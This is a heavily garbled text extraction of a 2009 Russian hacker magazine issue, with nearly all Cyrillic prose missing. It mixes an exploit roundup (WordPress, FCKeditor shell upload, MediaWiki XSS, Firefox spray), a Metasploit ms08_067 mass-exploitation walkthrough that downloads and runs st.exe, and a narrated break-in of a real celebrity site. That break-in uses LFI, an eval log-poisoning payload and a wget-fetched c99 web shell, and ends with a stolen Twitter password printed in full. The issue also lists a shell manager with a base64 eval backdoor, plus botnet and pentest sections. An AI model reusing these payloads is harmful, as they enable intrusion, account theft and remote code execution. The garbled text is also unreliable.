"Verdana,0"="Verdana,204"
2.
.
3. .
, LiveCD,
USB-Flash . :
Calculate Directory Server ( Calculate Linux)
Gentoo Linux
LiveCD
: , , ,
, , , ,
X 08 /128/ 09
>>
:
1. CD/DVD-, Calculate
Linux Desktop ( www.calculate-linux.ru).
2. / fdisk:
fdisk <drive>
<drive> .
3. , ext4,
ext3, ext2, reiserfs, xfs jfs.
4. :
:
/, -
, Linux-OS.
,
.
:
, , , .
. ,
- ,
.
, , . DriveCrypt, . , :
1. .
2. .
3. ,
X 08 /128/ 09
037
>>
.
, .
4. , .
5. Drivers, (, C:\) . .
6. , . :
DOS ( )
Vesta ( )
7. , ,
.
, , ,
.
,
. , , :).
20
Whois
78.108.96.47:8080
2009-07-20
189.56.61.33:3128
:).
-,
n- .
Find proxies for Me. . :
,
IP
( IP:
aaa,bbb,ccc,ddd<=255, : eeeee<=65536)
20
Czech Republic
anonymous
Brazil
2009-07-
anonymous
China
2009-07-
Whois
222.218.156.66:80
20
anonymous
Whois
Whois
2. .
3. ,
( Text).
4. ( IP/ ) , .
:
1. , , -.
:
61.172.249.96:80 anonymous
China
2009-07-20
Whois
75.151.214.249:8080
2009-07-20
72.55.136.167:3128
20
anonymous
Canada
2009-07-
anonymous
Brazil
2009-07-
anonymous
Brazil
2009-07-
anonymous
Iraq
2009-07-
Whois
189.127.163.1:3128
20
United States
Whois
189.108.93.244:3128
20
anonymous
Whois
Whois
213.185.116.218
3128
:
,
ACL-.
?
MACA ,
:
, MAC
,
. , , MAC,
IP! ,
. Sterm, Cain&Abel.
:
1. , Configure.
038
2. (
).
3. IP Spoofed Source Address.
:
# .htaccess-
Options +FollowSymLinks
RewriteEngine on
#
# IP
RewriteCond %{REMOTE_ADDR} !^1\.2\.3\.4$
# IP
RewriteCond %{REMOTE_ADDR} !^5\.6\.7\.8$
RewriteRule .* http://www.google.com/ [R=302,L]
IP, (,
X 08 /128/ 09
>>
- ), Google. :
# allow/deny .htaccess-
<limit GET>
satisfy any
order deny,allow
deny from all
allow from 63.76.22.2
allow from 130.116.16.
allow from 130.116.17.
: MD5,
:
,
,
. , Winpcap LibInject.
! . ,
. , Hashcracking.info. , ,
, ,
.
HashSearcher. mailbrush. 15 MD5-. :
hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm.
com. , ! ,
.
Perl:
$url = "http://md5.hashcracking.com/search.php?md5=$hash;
$lwp = LWP::UserAgent->new();
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en;
rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);
print md5.hashcracking.com
---- ;
: RAINBOW TABLE,
GPU
:
, ,
, , , winrtgen,
. GPU
, Zhu Shuanglei.
(rtgen CUDA)
project-rainbowcrack.com. XSerg. :
# ,
, ,
RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240
:
Md5 ;
X 08 /128/ 09
alpha ;
1 8 ;
0 ;
2400 40000000 ;
xek ;
240 . GeForce
GTX 280. 240 .
. z
CUDA
039
>>
(ICQ 884888)
/ HTTP://WAP-CHAT.RU /
OBZOR KSPLOITOV
- .
, , .
, WordPress, MediaWiki, Mozilla Firefox, MS
Internet Explorer MS Office,
web cms, WYSIWYG- FCKeditor.
01
WORDPRESS
>> Brief
WordPress
, . Core Security Technologies (http://
www.coresecurity.com/corelabs) ,
( )
.
XSS- , .
./
wp-admin/options-general.php?page=[plugin_page],
.
./wp-admin/admin.php, . :
// ,
./wp-content/plugins
if (isset($_GET['page']))
{
$plugin_page = stripslashes($_GET['page']);
$plugin_page = plugin_basename($plugin_page);
}
...
// Handle plugin admin pages.
if (isset($plugin_page))
{
if ( validate_file($plugin_page) )
{
040
,
.
.
>> Targets
WordPress 2.8 .
WordPress MU 2.7.1 .
>> Exploit
:
1. Collapsing Archives:
http://[some_wordpress_blog]/wp-admin/admin.php?page=/
collapsing-archives/options.txt
2. - Akismet, :
http://[some_wordpress_blog]/wp-admin/admin.
php?page=akismet/readme.txt
http://[some_wordpress_blog]/wp-admin/admin.
php?page=related-ways-to-take-action/options.php
>>
advisory http://milw0rm.com/
exploits/9110.
>> SOLUTION
, wordpress.com (
2.8.1).
02
FCKEDITOR
>> Brief
FCKeditor, TinyMCE, WYSIWYG- WEB-x, Zope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.
,
, CurrentFolder (, www.securitylab.ru/vulnerability/382191.php www.securityfocus.
com/bid/31812). ,
HTML based
.
, (http://dfn.dl.sourceforge.net/
sourceforge/fckeditor/FCKeditor_2.6.4.zip) , upload ./
editor/filemanager/connectors/php/upload.php:
<?php
...
$sCurrentFolder = GetCurrentFolder() ;
GetCurrentFolder(), ./editor/
filemanager/connectors/php/io.php:
function GetCurrentFolder()
{
if (!isset($_GET)) {
global $_GET;
}
$sCurrentFolder = isset( $_GET['CurrentFolder'] )?
$_GET['CurrentFolder'] : '/' ;
// Check the current folder syntax (must begin and
start with a slash).
if ( !preg_match( '|/$|', $sCurrentFolder ) )
$sCurrentFolder .= '/' ;
if ( strpos( $sCurrentFolder, '/' ) !== 0 )
$sCurrentFolder = '/' . $sCurrentFolder ;
// Ensure the folder path has no double-slashes
while ( strpos ($sCurrentFolder, '//') !== false )
{
$sCurrentFolder = str_replace (
'//','/', $sCurrentFolder) ;
}
// Check for invalid folder paths (..)
if ( strpos( $sCurrentFolder, '..' ) ||
strpos( $sCurrentFolder, "\\" ))
SendError( 102, '' ) ;
return $sCurrentFolder ;
}
, , FileUpload()
./editor/filemanager/connectors/php/commands.php:
function FileUpload(
$resourceType, $currentFolder, $sCommand )
{
...
// Map the virtual path to the local server path.
$sServerDir = ServerMapFolder($resourceType,
$currentFolder, $sCommand ) ;
MEDIAWIKI
...
AKISMET/README.TXT WORDPRESS
X 08 /128/ 09
041
>>
FCKEDITOR
-, Amalthea 13
XSS-.
./includes/specials/SpecialBlockip.php site.com/index.php/Special:Block.
, :
CALC.EXE, FIREFOX
...
move_uploaded_file( $oFile['tmp_name'],
$sFilePath ) ;
...
}
<?php
...
class IPBlockForm
{
...
function IPBlockForm( $par )
{
global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;
// wpBlockAddress $_REQUEST
$this->BlockAddress = $wgRequest->getVal(
'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) );
$this->BlockAddress = strtr(
$this->BlockAddress, '_', '' );
...
}
...
>> Exploit
FCKeditor ./editor/filemanager/
connectors/uploadtest.html.
, Select the File Uploader to use PHP (,
), Upload a
new file , .txt , ,
Current Folder - my-evil-shell.php%00.
, ,
Uploaded File URL (
./userfiles/test.php).
, $sFilePath move_uploaded_file()
($sServerDir),
($sFileName) - -.
// html-
function showForm( $err )
{
...
$user = User::newFromName( $this->BlockAddress );
...
//
wpBlockAddress -
Xml::input( 'wpBlockAddress', 45,
$this->BlockAddress, array(
FCKEDITOR
>> Targets:
FCKeditor <=2.6.4, web cms,
WYSIWYG-.
>> Solution
, http://www.
fckeditor.net.
03
MEDIAWIKI
>> Brief
-! MediaWiki,
042
X 08 /128/ 09
>>
CALC.EXE, ACTIVEX IE
TUN KERNEL
wpBlockAddress ( $thisBlockAddress) ,
.
>> Exploit
.
- :
04
MOZILLA
FIREFOX
>> Brief:
,
. Firefox
3.5, SBerry aka Simon Berry-Byrne
, .
Just-in-Time (JIT,
JavaScript ): JavaScript
HTML (, font)
, escape().
, , Andrew Haynes
( Denial of Service)
Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer
Overflow Vulnerability. unicode- write JS.
>> Targets
Firefox 3.5 , , .
http://site.com/index.php/Special:Block/?wpBlockAddre
ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a
href="
>> Solution
security- mozilla.
com/firefox.
XSS , .
>> Exploit:
PoC (http://milw0rm.com/exploits/9137),
calc.exe,
html- javascript:
>> Targets
MediaWiki:
MediaWiki <= 1.14.0
MediaWiki <= 1.15.0
>> Solution
,
mediawiki.org/wiki/Download.
X 08 /128/ 09
<html>
<head>
<script language="JavaScript" type=Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
043
>>
write() , ,
unicode-.
Firefox - (
).
05
MICROSOFT OFFICE WEB
COMPONENTS SPREADSHEET ACTIVEX
>> Brief:
.
IE,
Microsoft Office Web Components Spreadsheet ActiveX. ActiveX
Internet Explorer
Excel. , ,
msDataSourceObject()
(OWC 10 OWC11). (,
iframe)
. , IE,
MS Office,
.
44
044
>> Exploits
http://www.securitylab.ru/vulnerability/382430.php.
ActiveX, , OWC10.Spreadsheet
OWC11.Spreadsheet.
>> Targets:
Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Service Pack 1;
Microsoft Internet Security and Acceleration Server 2004 Standard Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2006;
Internet Security and Acceleration Server 2006 Supportability Update;
Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;
Microsoft Office Small Business Accounting 2006.
>> Solution:
, Microsoft .
CLSID:
{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}
06
LINUX
>> Brief:
17 *Nix-,
grsecurity Brad Spengler PoC
Linux.
, Linux
.
, net/tun - tun_chr_pool() drivers/net/tun.c:
X 08 /128/ 09
>>
XSS MEDIAWIKI
, :
sk ,
. ,
, , .
,
,
if(!tun).
, ,
0x00000000,
.
>> Exploits
,
http://milw0rm.com/exploits/9191.
>> Targets:
Linux kernel <= 2.6.30 ( GCC
-fdelete-null-pointer-checks).
>> Solution:
GIT- : http://git.
kernel.org. z
X 08 /128/ 09
045
>>
START
M0R0 / M0R0@INBOX.RU /
>>
, ,
? , , .
,
. , Metasploit,
.
-
. ?
, , -
.
x-tool'z,
, ..
.
, ,
.
,
. ,
,
.
XP
MS08_067 DB_UTOPWN
,
046
,
, . , 0-day,
. -,
nmap , ,
winpcap, .
EasyHack SKVOZ (z 2009)
. ,
.
,
. ,
, user guide. . ,
,
conficker
. , SKVOZ nmap
MS08_067.
-
.
.
,
.
2009 Microsoft
20 .
ms09-001 SMB.
, , ,
.
. , .
, .
( ,
).
(
WinXP) , ,
, X 08 /128/ 09
>>
C MS08_067
.
. -,
.
cp866, Windows cp1251,
Koi8-r Unicod.
, meterpreter,
.
.
.
(trac.metasploit.com/ticket/253).
, , . , , ,
.
,
,
. : ,
, -
.
AutoIT, SciTe
AutoIT .
, ,
.
,
SID, ,
SID S-1-5-32-544. SID API-
LookupAccountName, AdvAPI32.dll. Security.
au3 - _Security__LookupAccountName.
(
user.au3 DVD).
X 08 /128/ 09
TraySetState 2
AutoIT . , .
,
XP.
exe- .
, .
SMB. ,
,
user.
exe? , .
,
. , ftp.
ftp- ( FileZilla), ,
%temp%
ftp-
.
ftp.exe -s, user.exe .
.
,
. , ,
.
FTP ,
. ,
,
. ,
. , , .
( Radmin, VNC
..) .
, . RDP XP
:
.
, .
Redmond', ,
.
RDP, .
XP ,
( Home Edition, ,
).
,
- -
, , .
- XP ,
termsrv.dll
. ,
. , ,
, , ,
-
047
>>
XP
HTTP://WWW
links
:
metasploit.org.
DVD
dvd
:
final.au3.
termsrv.dll.
.
,
.
048
.
, dll Windows File
Protection. ( CD
), . ,
. ,
, , ,
, .
, , , .
, , , - . , .
. , , ,
metasploit, ,
, , , , , .
, , ,
.
, .
. DVD
final.au3, , .
,
, .
fsp, ,
.
Au3Info
AutoIT. ,
2 .
fsp , .
.
,
RDP. ,
XP, .
XP, sc
, ,
fsp. ,
, .
dll (
TermService, ,
), dll %systemroot%\
system32\DLLCache ( ), , ,
%systemroot%\system32.
.
%temp%,
(, ),
%temp%\final.exe . ? psexec
. RDP.
, .
SMB
SMB
. , , Microsoft, , (
). 14
smb; . ms08_067, , ,
. netapi32.dll,
, wcscat ( , conficker).
RPC- UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,
srvsvc.
,
. VmWare
, 2008 (
),
. , ,
.
,
ms08_067
!
, Make
SMB Connection error:53 (network path was not found).
, ,
. ,
.
X 08 /128/ 09
>>
DB_AUTOPWN
.
,
X 08 /128/ 09
SFX
windows/upexec/
bind_tcp.
.
, ,
, .
,
,
, ,
. windows/download_exec.
Web-,
.
,
, XAMPP. .
URL
.
Exploit failed:
No encoders encoded the buffer successfully.
: download_exec
,
,
stager, , download_exec/bind_tcp.
.
RDP ,
.
,
, .
,
. -,
db_autopwn
,
5. , 5
.
-, db_autopwn
,
sessions l. ,
,
,
download_exec ,
- .
049
>>
WEB- FTP-
XAMPP
INFO
info
Web-
FTP-
,
!
z. XAMPP
(apachefriends.org/
en/xampp.html).
,
PoC.
, ,
,
termsrv.dll ,
, ,
support_388945a0,
.
,
,
.
050
AUTOIT
%appdata%\msf32\
modules\payloads\singles\windows\download_exec.
rb . , , . !
session
Msf::Sessions::CommandShell.
.
, db_autopwn download_exec.
, SKVOZ
-b, ,
bind-.
, .
. ,
,
, . db_autopwn -.
db ( %appdata%\
msf32\lib\msf\ui\console\command_dispatcher\db.rb)
, meterpreter,
generic .
,
X 08 /128/ 09
>>
.
download_exec,
db.rb;
DVD .
- , -
, , -P.
:
-P,
; , .
.
,
.
%appdata%\.msf3\config
.
,
ms08_067
:
- TARGET=0 ( );
X 08 /128/ 09
- PAYLOAD=windows/download_exec/
bind_tcp;
- URL=http://172.16.1.10/st.exe.
, ,
.
,
RDP. .
metasploit
:
load db_sqlite3
db_create
db_nmap -sT -PN -PS445 -p445
172.16.1.0/24
setg URL http://172.16.1.10/st.exe
db_autopwn -e -p -P windows/
download_exec/bind_tcp -m ms08_067
<ENTER> .
.
sessions l,
30 ,
. , mstsc . ! 30- ,
5 .
, ESET NOD32 4, Dr.Web
. ,
Outpost Kaspersky Anti-Hacker.
. NMAP 116
445,
30.
, ,
! , ?
,
SRVSVC.
, !
,
(forum.antichat.ru/thread99665.html),
, .
, ,
. :
- , ,
!. , :).
,
.
,
! , ,
!
! z
051
>>
Payment Card Industry Data Security Standard (PCI DSS)
S4AVRD0W / S4AVRD0W@P0C.RU /
PCI DSS
>>
.
, .
, .
.
OSSTMM
OWASP.
-
, , Cobit, ISO/IEC
2700x, CIS/SANS/NIST/etc
PCI DSS.
, ,
,
. ,
. ,
.
,
052
, / .
,
,
OSSTMM
OWASP. , PCI DSS OWASP
(AsV), (QSA).
PCI DSS
:
1. (
)
.
2. -
(DoS). ,
.
3.
(PAN, Cardholder Name
..). (gray box)
.
,
24/7.
PCI :
X 08 /128/ 09
>>
Payment Card Industry Data Security Standard (PCI DSS)
DTP-
.11.1(b)
.11.2
(AsV)
.11.3.1
(Network-layer
penetration tests)
.11.3.2
(Applicationlayer penetration tests)
,
.
,
. ,
,
.
,
,
( , . Forb) . ,
PCI DSS, ,
:
(, , , ..)
(ACL/)
Web-
( , )
-
,
X 08 /128/ 09
(,
N ),
, ,
.
NETWORK-LAYER
PENETRATION TESTS
(promiscuous
mode).
Wireshark CommView.
, 1-2 .
.
:
(STP, DTP
..)
(RIP,
EIGRP ..)
(DHCP, BOOTP)
(telnet, rlogin
..)
,
, ,
. ,
,
.
:
Yersinia.
,
DTP-
( ). DTP
ACCESS/DESIRABLE
. .
OSI.
ARPpoisoning. . ,
, Cain&Abel Ettercap
( ,
, SSL). ,
ARP-poisoning
,
,
, .
,
, /
, -
( , ,
, etc).
ARP-poisoning
,
(
053
>>
WEB-BASED
SAINTEXPLOIT
INFO
info
:).
CORE IMPACT
APPLICATION-LAYER
PENETRATION TESTS
HTTP://WWW
links
pcisecuritystandards.
org PCI Security
Standards Council.
pcisecurity.ru ,
PCI DSS .
pcidss.ru ,
PCI DSS Digital
Security.
isecom.org/osstmm
Open Source
Security Testing
Methodology Manual.
owasp.org Open
Web Application
Security Project.
054
OSI. , ,
. ? .
Nmap Fast scan ( -F -T Aggressive|Insane),
( -p), ,
,
.
Nessus
XSpider ( ) .
(, Windows
NT 4.0), PCI .
,
- , .
PCI , -,
(
), -,
.
. . :).
.
,
. , -
. , .
,
.
1.
,
,
( !) -.
,
, . ,
. Core
Impact,
GUI-.
,
.
, , Core Impact, ,
, , ,
. Core Impact
.
: Core Impact, CANVAS, SAINTexploit
Metasploit Framework. , . ,
.
(,
).
Metasploit Framework. ,
zero-day , .
, ,
.
:).
, ,
.
. ,
, SAM (fgdump)
, LSA
(Cain&Abel),
. ,
PCI DSS (. 2.1, .2.1.1, .6.3.5, .6.3.6, .8.4,
.8.5.x).
X 08 /128/ 09
>>
2.
,
.
Windows (SMB),
.
,
, , ,
. PCI, ,
.
,
,
.
3.
, ,
-.
, , ( ,
SNMP) . AsV-
PCI DSS
,
DoS.
PCI,
(, WEB, ..).
Web. PCI Web . QSA-.
blackbox- server/client-side .
,
Web. HP WebInspect
Acunetix Web Vulnerability Scanner (,
, AJAX).
,
, w3af,
X 08 /128/ 09
Web-.
Web! , ,
, -,
, SQL,
- . client-side , ,
, .
server-side ,
- , PCI DSS.
, PAN, Cardholder Name CVC2/
CVV2 . ,
,
SQL-
, ;
,
. Blind
SQL-, Web-
sqlmap ( --dump-all),
MySQL, Oracle, PostgreSQL
Microsoft SQL Server.
.
. ,
AppDetective Application Security Inc.,
. ,
,
,
AppDetective,
, .
, ,
. ,
:
Oracle Database Client
Toad for Oracle
PL/SQL
Oracle Assessment Kit SID
PL/SQL
(,
)
PCI
, , ,
,
, Open AP, WEP WPA/
PSK. , PCI
,
.
. , , aircrack-ng.
, ,
Caffe Latte,
.
Wirelessdefence.org.
PCI DSS. , ,
,
.
PCI,
MasterCard AsV-.
,
PCI DSS,
,
,
,
MasterCard.
! z
055
>>
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Controlling
Server
Bot Infection
NUMBER OF COMMANDS
Concurrent
Attacks
- Infection Activities
- DoS Attacks
- Spam Mails
- Spyware
- Upgrades its
functionalities, etc
Malicious
User
Internet
User
Targeting Site
for Attacks
>>
,
, --
.
- ( !). ,
, .
.
. , ,
:).
, 2
. ,
, , , .
056
,
...
1000 10.000 ,
, , .
,
100.000.
,
,
.
X 08 /128/ 09
>>
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Targeting Site
for Attacks
P2P
:)
, . , ,
, ,
,
.
, , .
, ,
, , . ,
.
,
: ,
, .
.
, ,
.
, (
!
,
.
:
, :).
:
. .
:
?
? :).
X 08 /128/ 09
, , .) . :
.
, .
.
IRC,
,
- . ,
,
.
p2p web.
p2p ,
.
,
.
:
...
web'
. , Zeus.
,
(
).
, ,
,
,
,
.
.
,
. ,
.
, (). ,
.
:
1234, : 6452, 12, 761 ..
, .
, ,
, -
,
.
.
:
, -
,
,
, ,
,
. . :
.com
.org
.ho.ua
057
>>
Controlling
Server
HTTP://WWW
links
RSA-:
ru.wikipedia.org/wiki/
RSA.
Malicious
: ru.wikipedia.
User
org/wiki/__.
:
ru.wikipedia.org/wiki/
.
IRC-
INFO
info
RSA (
Rivest, Shamir
Adleman)
.
RSA ,
,
.
,
.ho.ua .
,
, .
. , , , , temp123.
txt, .
, , ,
.
( , ).
; , temp123.
txt . -
( , ..), . ,
.
,
, .
(, .
Pseudorandom number generator, PRNG) ,
,
( ).
-
.
.
. ORNL (.):
,
.
. ,
. :
,
, .
.
. .
:
,
,
, . .
:
WARNING
warning
.
058
: 3001-3004
:
3001 3004 . 4 ,
.
,
. 4 ( )
RSA-
X 08 /128/ 09
>>
Controlling
Server
, ,
RSA-
, ,
).
, , :
___: " "
RSA
: 3001
,
,
,
.
,
-
- .
.
, ,
, , , , , . ,
AES-,
BASE64. , ,
, .
, .
,
Perl', , ,
.
RSA. RSA
, ,
, .
. :
, . - .
:
1. _
2. tutamc.com
X 08 /128/ 09
3. 00:01 08.07.2009
4. 23:59 09.07.2009
5. 1
6. ...
7. ___
, .
,
( ).
(, ) ,
, . ,
, ,
,
. ,
, ,
.
.
RSA 2048 .
. ,
,
- , AES.
.
, , .
(
,
. .
, ,
, ,
, .
RSA.
.
, .
POST-.
,
( , tttt123.php).
, ( tttt123.php
). ,
, , .
, . ,
. ,
.
Python'e,
. ,
,
.
FROM MY
, ( )
, , (
) , . ,
. z
059
>>
TWITTER-
,
- , . ,
( ).
. ,
V ,
.
,
http://www.
stephenfry.com ,
-, .
stephenfry.com/clubfry/twitter.
API , ,
-
:). ,
twitter (twitter.com/stephenfry),
644,489(!) .
.
WordPress
phpBB.
(stephenfry.
com/blog), :
060
<meta name="generator"
content="WordPress 2.5.1" />
, 2.5.1
,
.
phpBB. ,
stephenfry.
com/forum/docs/CHANGELOG.html.
change Changes since 2.0.20,
,
- (, ,
XSS CSRF ).
XSS phpBB,
:
site:stephenfry.com filetype:php
PHP-, . stephenfry.com/section.php?
section=clubfry&subsection=twitter.
:
, .
,
:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/etc/passwd%00
/etc/passwd :).
-
! ,
.
z,
X 08 /128/ 09
>>
STEPHENFRY.COM
, /proc/self/*.
/proc/self/environ:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/proc/self/environ%00
, /proc/self/environ
:(.
.
, error_log /proc/self/fd/2 ( , access_log
-
, LFI).
error_log
referer,
PHP-. , .
:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /
evil-,
Host. , , :
STEPHENFRY.COM
z:/usr/local/bin/curl.exe "http://
www.stephenfry.com/" -H "Host:"
--referer "<?php eval($_GET[cmd]);
?>"
,
error_log:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /,
referer: <?php eval($_GET[cmd]); ?>
X 08 /128/ 09
061
>>
HOST
HTTP://WWW
links
www.stephenfry.
com
.
ru.wikipedia.org/
wiki/_
.
twitter.com/
stephenfry
.
INFO
info
(Stephen John
Fry)
,
,
(
,
).
(1997).
, , ,
.
062
:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=phpinfo();
find
./ -type d -perm 0777 -ls , , .
/home/fry/public_html/img/blog_thumbs/
C99madShell blog.php wget:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=system('wget -O /home/fry/public_
html/img/blog_thumbs/blog.php http://madnet.
name/files/download/9_c99madshell.php');
. /home/fry/public_html/index.php:
<?php
include_once("lib/sf_main.php");
$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/
navigation/header.php");
...
?>
lib/sf_main.php:
<?php
include_once
include_once
include_once
include_once
...
?>
"sf_constants.php";
"sf_db_class.php";
"sf_template.php";
"sf_cache_functions.php";
, , lib/sf_constants.php:
<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMz
X 08 /128/ 09
>>
d3bzQ=');
...
?>
, SF_TWITTER_PASSWORD
base64,
base64_decode w41la8yon37wo4.
! (
).
twitter.com
.
-, twitter.com,
stephenfry w41la8yon37wo4 :).
What are you doing?, Ill
be watching you! From Russia with love :) (
).
:
RegNomSongs by The Police and Matt Monroe. This is a
quiz, right? RT @stephenfry: Ill be watching you! From
Russia with love :)
---
, , ,
From Russia with love ,
.
-
, ,
// . , ,
:).
P.S. ,
. z
/ETC/PASSWD
WARNING
warning
.
.
,
,
.
X 08 /128/ 09
063
>>
R0ID
/ R0ID@BK.RU /
>>
:MAIL.RU HISTORY READER
: WINDOWS 2000/XP
:GAR|K
-
IM-
.
.
mail- Mail.ru,
.
, -
. ,
, :). , Mail.ru
History Reader. mail-
.
:
1. , : blabla@
mail.ruhistory.txt
2. DVD
3. history-
:
C:\conv.exe blabla@mail.ruhistory.
txt blabla@mail.ru.txt
4. blabla@mail.u.txt,
:)
: ODNOKLASSNIKI.RU
PASSWORD CHANGER & ACCOUNT
CHECKER
: WINDOWS 2000/XP
: ZDEZ BIL YA
-
,
.
064
,
odnoklassniki.ru
: Odnoklassniki.ru Password Changer
Odnoklassniki.ru Account Checker.
,
.
aka .
:
accounts.txt, : ;.
:
good_acc.txt ,
;_
bad_acc.txt ,
;_
error_acc.txt ,
,
,
bad_acc.txt, :
( )
,
.
:
accounts.txt, :
;.
:
good_acc.txt ,
block_acc.txt , ,
-
bad_acc.txt , -
error_acc.txt , ,
,
. ,
win32-,
PHP/-, . Zdez Bil Ya
:).
: SHELL MANAGER
: *NIX/WIN
: KRIST_ALL
, , web-. ,
,
,
:). :
? Krist_ALL'
Shell manager, . -,
, :
-
X 08 /128/ 09
>>
-
-
- PR//Alexa_Rank
-
( -,
-)
-
:
1. ,
( : password)
2.
3. ,
$install 1
:
//---- ---------------$db_host = ''; //
$db_login = ''; //
$db_password = ''; //
$db_name = ''; //
//---- Shell Mananger---$use_auth = 1; // 1 , 0
$install = 1; // 1,
$password = 'password'; //
.
4. - :
if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss
=base64_decode($_GET['ev']);
eval($sss); exit; }
5. , -.
: FTP PARSER
:*NIX/WIN
: [QWYZ]
-
: ? ,
,
. ,
FTP Parser,
-
. PHP-
3 :
X 08 /128/ 09
- (, blabla.com)
, , :
$z = (, &z=com),
, * (,
&z=*)
$m = (, &m=14), ,
* (, &m=*)
$base = -,
./bases (, &base=file.txt)
$all = (, &all=1,&all=0)
$save = ( ./querie), ,
&save=yes,&save=no
$word =
(,
&word=blabla)
, , ,
./bases ( ) ./queries,
:
http://_/parser.
php?z=com&m=14&base=ftps.txt&all=0&s
ave=yes&word=freehostia.com
, .
: SYMVPN
:SYMBIAN
: TELEXY.COM
-
, - .
SymVPN
, VPN.
Symbian OS 3rd, ,
.
VPN-
SymVPN, PPTP
128- MPPE.
www.telexy.com, Symbian OS.
SymRDP (Symbian Remote Desktop Connection
Client), SymNC (Network Commander)
. , , x-USSR 40% (telexy.com/
Support/Publications.aspx?codeid=WGSBI6X6KV),
.
14 .
, ,
- 820 :).
(email, imei ). ,
IMEI- . ,
, :
1.
2.
3. , ,
(GPRS/Wi-Fi), IP-,
,
VPN-
4. .
,
VPN (IP///
DNS)
5.
( SymVPN)
.
, , VPN-
Symbiain- VPN.
,
.z
065
>>
1) Canon Cat
2) (70- )
3)
4)
MIFRILL
/ MIFRILL@REAL.XAKEP.RU /
IT .
, , ,
, .
, , .
Apple Macintosh, ,
, Apple .
,
,
,
, ,
.
, (Jef)
,
,
.
-, , ,
, .
26- 2005, 61
.
066
,
.
, -
,
:
. , ,
,
.
, ,
(, ,
,
?).
,
.
, , ,
.
.
,
,
Apple
,
,
.
Apple
1978 ,
31- . ,
23 1943,
,
,
.
,
, ,
,
.
Apple
. , , ,
,
,
.
X 08 /128/ 09
>>
3
,
-,
.
, , , IT
.
.
,
:
, .
, , . 70-
Western Wind ( ),
.
, ,
,
-
. Western Wind
(
, 70-)
,
.
, .
X 08 /128/ 09
4
,
? , ,
,
.
, Apple
(
),
!
, ,
, ,
,
( Apple II).
,
,
-
. , ,
(
, ).
.
,
, ,
.
.
, ,
, . 1964-1965
,
,
.
(1967)
,
. , 70-
,
,
.
, ,
Apple
,
, ,
.
APPLE,
,
, .
.
Apple,
Annie,
.
,
.
,
, ,
. ,
,
,
.
, ,
- ,
. , , ,
. ,
(Macintosh)
,
McIntosh, .
,
,
.
-
,
, Apple
.
,
Apple Lisa,
,
.
, -
067
>>
1) Canon
2) Apple Macintosh
( , , ).
, . Apple
, .
1
- , , .
, , [
] , ,
. ,
, ,
GUI
( ),
. ,
,
Lisa.
Apple III, .
( , Apple III $5000-8000), !
Apple III
, ,
. Apple Lisa, ,
Apple III, .
, ,
.
, , .
,
,
. , ,
Lisa , .
, ,
, , , . ,
apple- . ,
. ,
, , Xerox
.
, , .
,
,
, .
,
. ,
,
Macintosh Bicycle, . ,
, ,
,
, . ,
, -
.
1982 , ,
, ,
. ,
,
,
Apple.
. ,
Apple,
. Information Appliance, , .
Information Appliance
Apple II SwyftCard, SwyftWare.
-
, .
, .
, . ,
, ,
, ,
, .
, .
(, ),
, . , ,
, , , .
.
. ?
.
( GUI ),
,
, ,
.
.
SWYFT.
GUI SWYFT , , ,
-. , .
, SWYFT
, ,
. ,
,
, ,
. - , SWYFT
, , ,
.
LEAP (), ,
, Firefox, <Ctrl+F>.
, ,
LEAP-,
. , ,
LEAP
, , .. ,
, .
. , ,
, - , , QWERTY,
X 08 /128/ 09
>>
, .
SWYFT ,
.
(,
), ,
.
SWYFT
Apple II,
.
Information Appliance
,
-
Canon. , Canon
Motorola 68000 (
),
Canon Cat.
, ,
. 1987 ,
,
. .
,
(
20.000 ), ,
Canon
. ,
.
, Canon
, -
,
. , , ,
,
Apple NeXT Computers.
, ,
Canon
( ),
. , ,
.
, ,
.
X 08 /128/ 09
, , ,
,
Canon,
,
2000- !
THE, ARCHI
1989
Information Appliance,
- .
90-,
,
,
. ,
BAYCHI (Bay-Area Computer-Human
Interface) ,
-,
,
IT (,
BMW). , ,
,
,
.
The Humane Interface, 2000 .
: .
-, ,
, ,
:).
SWYFT The Humane Environmen (
THE),
The Humane Interface. ,
,
30 ,
( ,
-, ).
, IT- .
THE ,
